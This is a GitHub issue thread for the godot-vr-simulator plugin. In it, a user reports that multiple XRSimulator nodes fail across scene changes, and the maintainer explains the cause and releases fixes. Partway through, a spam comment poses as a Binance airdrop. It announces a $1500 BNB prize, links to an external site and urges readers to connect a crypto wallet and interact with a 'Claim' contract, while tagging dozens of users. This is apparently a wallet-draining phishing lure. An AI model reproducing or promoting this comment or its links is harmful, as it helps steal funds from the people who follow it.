### ISSUE TITLE
Multiple XRSimulators seems not to work. Example: Godot XR Tools 

### ISSUE THREAD

**Issue by Eisenspalter** [Cafezinhu/godot-vr-simulator#6]
I tried to include it in my test program. The structure of my test program is the same as the Godot XR Tools demo scenes. But there are several XROrigins here. At least 2.(loading screen, and then the actual scenes). When I install multiple XRSimulators, only the loading screen works. When the actual scene is to be displayed, an error message comes up
![image](https://github.com/Cafezinhu/godot-vr-simulator/assets/4734410/a2f2cd1a-cabf-4aaf-b404-f18ddd38c551)

**Comment by Cafezinhu** [comment]
This bug happens because the simulator tries to stop working if controllers are detected. Since the simulator create devices for the XR Server, other simulators will detect those controllers and will not work. This system was created to disable all simulators in an exported app, preventing unwanted behaviors. I have to create another way to make auto-deactivation, so that people don't need to disable the emulators manually everytime they export their app.

The bug seems to be fixed now
https://github.com/Cafezinhu/godot-vr-simulator/releases/tag/v.1.1.1

**Comment by Eisenspalter** [comment]
Great much better. But there is still a bug if you use multiple XRSimulators. My app has nearly the same structure like the Godort XR-Tools Demo project. You can test it with it. the https://github.com/GodotVR/godot-xr-tools. I got no errors but I cannot navigate correctly.

**Comment by anilv2k** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @Vinny-Oliver, @Mikelovex, @suziziziz, @PedruCesar, @dknop97, @nannayusuf, @Luuck4s, @riessnico, @LucasAndFlores, @srcmilena, @marcelohmoura, @censuradho, @augustosilas, @EvaristoAlves, @Raphaelsan, @Ecyo-Felipe, @lira, @hellyanalves, @MatheusGobetti, @Daniel-Freitas0, @alex-yudi, @mateusribs, @pdrzan, @higorslva, @ukexim65, @GabrielMartins11, @munirix, @leandrosoaresls, @lisaldo, @adielseffrin, @AkiraGabriel, @0jonjo, @0xjoaovpsantos, @Sachetty, @edfrater, @SUNSOL87, @matheus-vandyke, @thallesvilaapps, @klebervirgilio, @jeffersonfs, @SobrancelhaDoDragao, @Leandroguering, @arsaccol, @Bremda, @cpenaforte, @phgrund, @pedrox-hs, @rhanything, @MatheusSantanaaa, @brambillagabrielle

**Comment by Cafezinhu** [comment]
Fixed in [v1.2.0](https://github.com/Cafezinhu/godot-vr-simulator/releases/tag/v1.2.0)
Now you can set ``XRSimulator.tscn`` into Autoload and it will work on all scenes.
